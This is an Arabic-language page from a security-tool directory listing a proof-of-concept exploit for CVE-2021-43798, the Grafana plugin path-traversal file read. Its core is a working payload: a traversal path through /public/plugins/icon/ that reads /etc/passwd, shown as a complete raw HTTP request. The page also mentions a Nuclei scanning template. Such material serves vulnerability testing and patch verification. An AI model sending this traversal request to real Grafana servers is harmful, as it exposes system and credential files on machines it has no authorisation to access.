Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/bjliyanliang/cve-2021-43798-grafana-file-read
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubbjliyanliang/cve-2021-43798-grafana-file-read

CVE-2021-43798-Grafana-File-Read

إثبات مفهوم لاستغلال قراءة الملفات غير المصرح بها في Grafana (CVE-2021-43798)، يوضح اجتياز المسار لقراءة ملفات عشوائية، مع قالب Nuclei للفحص الآلي.

عرض المستودع
1منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Grafana-File-Read

قراءة الملفات غير المصرح بها في Grafana

الإصدارات المتأثرة: 8.0.0-الأحدث

wecom-temp-e380dc0174f4d9f46e9e217a6e2c3ddb

poc: /public/plugins/icon/../../../../../../../../../../../../../../../../../../etc/passwd

root@kitploit:~
GET /public/plugins/icon/../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 127.0.0.1:3000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

image

poc الخاص بـ nuclei: grafana.yaml

image

تنزيل الأداة